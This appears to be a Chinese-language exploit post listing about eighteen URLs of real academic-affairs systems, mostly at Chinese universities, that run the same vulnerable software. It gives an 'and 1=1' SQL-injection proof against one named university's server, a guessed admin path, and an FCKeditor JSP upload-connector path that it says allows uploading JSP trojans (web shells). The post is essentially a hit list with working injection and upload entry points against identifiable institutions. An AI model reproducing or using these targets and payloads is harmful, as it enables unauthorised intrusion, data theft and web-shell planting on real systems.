http://jwc.sau.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=1081
http://211.82.200.116:8000/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=244
http://jiaowu.dlufl.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=410
http://www1.hbjcxy.com/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=181
http://www.vtcsy.com:8080/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=61
http://cityjw.dlut.edu.cn:7001/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=163
http://121.22.25.5/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=270
http://218.7.95.52:800/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=61
http://202.97.179.124:8000/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=1241
http://202.119.189.236:8085/ACTIONSHOWBOARD.APPPROCESS?mode=2&BoardFileID=2436
http://jwk.dlvtc.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=482
http://gz.syphu.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=301
http://jwgl.hrbcu.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=461
http://59.73.112.22/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=563
下面这几个没有发布新闻,所以没ID:
http://123.233.253.163:8080/index.jsp
http://218.8.131.152:8888/ACTIONSHOWFILES.APPPROCESS?mode=1
http://202.198.129.163/
http://221.211.54.6/ACTIONSHOWFILES.APPPROCESS?mode=1
以下是注入证明,例如“中国药科大学教务处”,
http://202.119.189.236:8085/ACTIONSHOWBOARD.APPPROCESS?mode=2&BoardFileID=2436 and 1=1 正常
后台好像是:
http://edu.0day5.com/Main.jsp
#3.另外说到该系统的任意文件上传,不过有大多管理员还是聪明的删掉了,但还是有存在FckEditor编辑器的导致可以上传任意JSP脚本木马,编辑器漏洞地址:
http://edu.0day5.com/FCKeditor/editor/filemanager/browser/default/browser.html?connector=./connectors/jsp/connector
#4.有编辑器的地方就是跑马场!